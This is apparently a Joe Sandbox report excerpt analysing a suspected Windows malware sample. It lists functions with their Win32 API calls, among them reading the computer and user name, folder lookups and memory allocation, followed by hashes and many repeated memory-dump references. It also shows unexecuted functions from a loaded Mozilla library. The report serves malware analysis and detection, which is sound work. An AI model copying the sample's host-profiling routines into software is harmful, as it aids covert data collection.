Associated: 00000000.00000002.1663178697.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663485193.00000000008BA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663600851.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663623096.0000000000A52000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$FileFindFirstFolderPathwsprintf
String ID:
API String ID: 2699682494-0
Opcode ID: ea2ce155a7571504372821201740ffebec5edf575848e106537ebe399aeff3b2
Instruction ID: 835e76df35dd14cd973b35fb92eaba2933ca06d1aeaf8b2d8e6f86207633d06f
Opcode Fuzzy Hash: ea2ce155a7571504372821201740ffebec5edf575848e106537ebe399aeff3b2
Instruction Fuzzy Hash: 50019B7794030857C755FBB0EC42EEE733DAB54340F004599B6899A191EE70AAC98B92

Function 003C10A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 003C10B3
VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 003C10F7

Memory Dump Source

Source File: 00000000.00000002.1662498054.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1662458997.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000007A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663485193.00000000008BA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663600851.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663623096.0000000000A52000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 1beb428222cc9ac6bbfa8990122f329d5d9cd8f4f00cd9f3e59453bbca7b4894
Instruction ID: 065970c489a03c08ef9caa2e37a0c998c162a0af04453e5bbbfd7dccd70a1c6c
Opcode Fuzzy Hash: 1beb428222cc9ac6bbfa8990122f329d5d9cd8f4f00cd9f3e59453bbca7b4894
Instruction Fuzzy Hash: 6DF0E2B1681318BBE7149BA4AC59FABB7E8E705B55F305448F504E7280D671AE00DBA1

Function 003D8D90 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,003C1B54,?,?,003E564C,?,?,003E0E1F), ref: 003D8D9F

Memory Dump Source

Source File: 00000000.00000002.1662498054.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1662458997.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000007A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663485193.00000000008BA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663600851.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663623096.0000000000A52000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 9e8d112ba9d53a9583f5065bd2f8bf3330fd33e18464c84ffa40b13c1d275b82
Instruction ID: 1d1c6e70677773b8122c870807d5acfce353212e1082c176a02b59e16fb248c6
Opcode Fuzzy Hash: 9e8d112ba9d53a9583f5065bd2f8bf3330fd33e18464c84ffa40b13c1d275b82
Instruction Fuzzy Hash: CFF0AC75C00208EBCF05EF94E5456DDBB75EB14310F10819AE8556B3D0EB746A55DB81

Function 003D8DE0 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 003D8E0B

Part of subcall function 003DA740: lstrcpy.KERNEL32(003E0E17,00000000), ref: 003DA788

Memory Dump Source

Source File: 00000000.00000002.1662498054.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1662458997.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000007A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663485193.00000000008BA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663600851.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663623096.0000000000A52000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: FolderPathlstrcpy
String ID:
API String ID: 1699248803-0
Opcode ID: 9a886eb1cfea402059a3e96a9f488ffc6adcd2c6f58eaec6a0a7127e29b970d1
Instruction ID: 18d48525b54012269990032f2696f972ea28f30cbaace552bae9a62240976ff7
Opcode Fuzzy Hash: 9a886eb1cfea402059a3e96a9f488ffc6adcd2c6f58eaec6a0a7127e29b970d1
Instruction Fuzzy Hash: 7DE0127594034C6BDB51EB90DC96FAE737C9B44B01F004295BA0C5A1C0DE70AB858B91

Function 003C1190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 003D78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 003D7910
Part of subcall function 003D78E0: RtlAllocateHeap.NTDLL(00000000), ref: 003D7917
Part of subcall function 003D78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 003D792F

Part of subcall function 003D7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,003C11B7), ref: 003D7880
Part of subcall function 003D7850: RtlAllocateHeap.NTDLL(00000000), ref: 003D7887
Part of subcall function 003D7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 003D789F

ExitProcess.KERNEL32 ref: 003C11C6

Memory Dump Source

Source File: 00000000.00000002.1662498054.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1662458997.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000007A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663485193.00000000008BA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663600851.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663623096.0000000000A52000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateName$ComputerExitUser
String ID:
API String ID: 3550813701-0
Opcode ID: 0082cf759ef70b4110f222ad5f179a98c69207813e7cab3de249815d93ccc3de
Instruction ID: 1a0fc94fe00014ee273caf0fa99ca43e2df7f745e7f40c0bf2967c53a9d544d2
Opcode Fuzzy Hash: 0082cf759ef70b4110f222ad5f179a98c69207813e7cab3de249815d93ccc3de
Instruction Fuzzy Hash: 97E012B6D9430153CB0273F4BC0BF2B339D5B15389F08142AFA05D6343FA29F8109666

Function 003D8E30 Relevance: 1.3, APIs: 1, Instructions: 35memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,-00000001), ref: 003D8E52

Memory Dump Source

Source File: 00000000.00000002.1662498054.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1662458997.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000007A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663485193.00000000008BA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663600851.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663623096.0000000000A52000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: a23706e6191b66bfa20f68f17e05e1a782400da1a11bd5e84abc75b991f08142
Instruction ID: ca24e27e70b3daee0baaab8f788fd04e3726511b12774f9d5fa150e5f5a8717c
Opcode Fuzzy Hash: a23706e6191b66bfa20f68f17e05e1a782400da1a11bd5e84abc75b991f08142
Instruction Fuzzy Hash: B6011931A04208EFCB06CF98D585BACBBB5EF44308F288589E9056B391C7756F84DF85

Non-executed Functions

Function 6CB95440 Relevance: 138.8, APIs: 54, Strings: 25, Instructions: 587threadtimeCOMMON

Download Yara Rule

APIs

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING), ref: 6CB95492
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CB954A8
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CB954BE
__Init_thread_footer.LIBCMT ref: 6CB954DB

Part of subcall function 6CBBAB3F: EnterCriticalSection.KERNEL32(6CC0E370,?,?,6CB83527,6CC0F6CC,?,?,?,?,?,?,?,?,6CB83284), ref: 6CBBAB49
Part of subcall function 6CBBAB3F: LeaveCriticalSection.KERNEL32(6CC0E370,?,6CB83527,6CC0F6CC,?,?,?,?,?,?,?,?,6CB83284,?,?,6CBA56F6), ref: 6CBBAB7C

Part of subcall function 6CBBCBE8: GetCurrentProcess.KERNEL32(?,6CB831A7), ref: 6CBBCBF1
Part of subcall function 6CBBCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6CB831A7), ref: 6CBBCBFA

GetCurrentThreadId.KERNEL32 ref: 6CB954F9
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_HELP), ref: 6CB95516
GetCurrentThreadId.KERNEL32 ref: 6CB9556A
AcquireSRWLockExclusive.KERNEL32(6CC0F4B8), ref: 6CB95577
moz_xmalloc.MOZGLUE(00000070), ref: 6CB95585
?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(00000000,00000001), ref: 6CB95590
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP,?,00000001), ref: 6CB955E6
ReleaseSRWLockExclusive.KERNEL32(6CC0F4B8), ref: 6CB95606
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CB95616

Part of subcall function 6CBBAB89: EnterCriticalSection.KERNEL32(6CC0E370,?,?,?,6CB834DE,6CC0F6CC,?,?,?,?,?,?,?,6CB83284), ref: 6CBBAB94
Part of subcall function 6CBBAB89: LeaveCriticalSection.KERNEL32(6CC0E370,?,6CB834DE,6CC0F6CC,?,?,?,?,?,?,?,6CB83284,?,?,6CBA56F6), ref: 6CBBABD1

GetCurrentThreadId.KERNEL32 ref: 6CB9563E
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CB95646
exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 6CB9567C
free.MOZGLUE(?), ref: 6CB956AE

Part of subcall function 6CBA5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6CBA5EDB
Part of subcall function 6CBA5E90: memset.VCRUNTIME140(6CBE7765,000000E5,55CCCCCC), ref: 6CBA5F27
Part of subcall function 6CBA5E90: LeaveCriticalSection.KERNEL32(?), ref: 6CBA5FB2

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_NO_BASE), ref: 6CB956E8
GetCurrentThreadId.KERNEL32 ref: 6CB95707
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00000001), ref: 6CB9570F
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_ENTRIES), ref: 6CB95729
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_DURATION), ref: 6CB9574E
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_INTERVAL), ref: 6CB9576B
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FEATURES_BITFIELD), ref: 6CB95796
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FEATURES), ref: 6CB957B3
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FILTERS), ref: 6CB957CA

Strings

MOZ_PROFILER_STARTUP_INTERVAL, xrefs: 6CB95766
MOZ_PROFILER_STARTUP_ENTRIES, xrefs: 6CB95724
MOZ_PROFILER_STARTUP_DURATION, xrefs: 6CB95749
- MOZ_PROFILER_STARTUP_INTERVAL not a valid float: %s, xrefs: 6CB95D01
[I %d/%d] -> This process is excluded and won't be profiled, xrefs: 6CB95BBE
GeckoMain, xrefs: 6CB95554, 6CB955D5
MOZ_PROFILER_STARTUP, xrefs: 6CB955E1
[I %d/%d] - MOZ_PROFILER_STARTUP is set, xrefs: 6CB95717
- MOZ_PROFILER_STARTUP_ENTRIES not a valid integer: %s, xrefs: 6CB95D24
MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6CB954A3
MOZ_PROFILER_STARTUP_FILTERS, xrefs: 6CB957C5
[I %d/%d] - MOZ_PROFILER_STARTUP_ENTRIES = %u, xrefs: 6CB95C56
MOZ_BASE_PROFILER_LOGGING, xrefs: 6CB954B9
[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES_BITFIELD = %d, xrefs: 6CB95AC9
MOZ_BASE_PROFILER_HELP, xrefs: 6CB95511
MOZ_PROFILER_STARTUP_FEATURES, xrefs: 6CB957AE
[I %d/%d] - MOZ_PROFILER_STARTUP_FILTERS = %s, xrefs: 6CB95B38
[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES = %d, xrefs: 6CB9584E
MOZ_PROFILER_STARTUP_FEATURES_BITFIELD, xrefs: 6CB95791
- MOZ_PROFILER_STARTUP_ENTRIES unit must be one of the following: KB, KiB, MB, MiB, GB, GiB, xrefs: 6CB95D2B
MOZ_PROFILER_STARTUP_NO_BASE, xrefs: 6CB956E3
- MOZ_PROFILER_STARTUP_FEATURES_BITFIELD not a valid integer: %s, xrefs: 6CB95D1C
MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6CB9548D
[I %d/%d] profiler_init, xrefs: 6CB9564E
- MOZ_PROFILER_STARTUP_DURATION not a valid float: %s, xrefs: 6CB95CF9

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID: getenv$CriticalSection$Current$Thread$EnterLeaveProcess$ExclusiveLock_getpidfree$AcquireCreation@Init_thread_footerReleaseStamp@mozilla@@TerminateTimeV12@exitmemsetmoz_xmalloc
String ID: - MOZ_PROFILER_STARTUP_DURATION not a valid float: %s$- MOZ_PROFILER_STARTUP_ENTRIES not a valid integer: %s$- MOZ_PROFILER_STARTUP_ENTRIES unit must be one of the following: KB, KiB, MB, MiB, GB, GiB$- MOZ_PROFILER_STARTUP_FEATURES_BITFIELD not a valid integer: %s$- MOZ_PROFILER_STARTUP_INTERVAL not a valid float: %s$GeckoMain$MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_HELP$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING$MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_DURATION$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL$MOZ_PROFILER_STARTUP_NO_BASE$[I %d/%d] -> This process is excluded and won't be profiled$[I %d/%d] - MOZ_PROFILER_STARTUP is set$[I %d/%d] - MOZ_PROFILER_STARTUP_ENTRIES = %u$[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES = %d$[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES_BITFIELD = %d$[I %d/%d] - MOZ_PROFILER_STARTUP_FILTERS = %s$[I %d/%d] profiler_init
API String ID: 3686969729-1266492768
Opcode ID: 7ffd82e04a3e88f7ef10f2658f032bcac069ebeadc7173eea526aaf9d56afe6a
Instruction ID: 01245c68ae86fa24627ee0672cbf406b856215df297e53dab163f85f78aa2de7
Opcode Fuzzy Hash: 7ffd82e04a3e88f7ef10f2658f032bcac069ebeadc7173eea526aaf9d56afe6a
Instruction Fuzzy Hash: 18220074B043809FEB009F74C85466ABBB4EF4730EF15463DE94697A41EB368849CB6B

Function 6CB96C80 Relevance: 95.2, APIs: 50, Strings: 4, Instructions: 727encryptionfileCOMMON

Download Yara Rule

APIs

CryptQueryObject.CRYPT32(00000001,?,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6CB96CCC
CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6CB96D11
moz_xmalloc.MOZGLUE(0000000C), ref: 6CB96D26

Part of subcall function 6CB9CA10: malloc.MOZGLUE(?), ref: 6CB9CA26

memset.VCRUNTIME140(00000000,00000000,0000000C), ref: 6CB96D35
CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6CB96D53
CertFindCertificateInStore.CRYPT32(00000000,00010001,00000000,000B0000,00000000,00000000), ref: 6CB96D73
free.MOZGLUE(00000000), ref: 6CB96D80
CertGetNameStringW.CRYPT32 ref: 6CB96DC0
moz_xmalloc.MOZGLUE(00000000), ref: 6CB96DDC
memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6CB96DEB
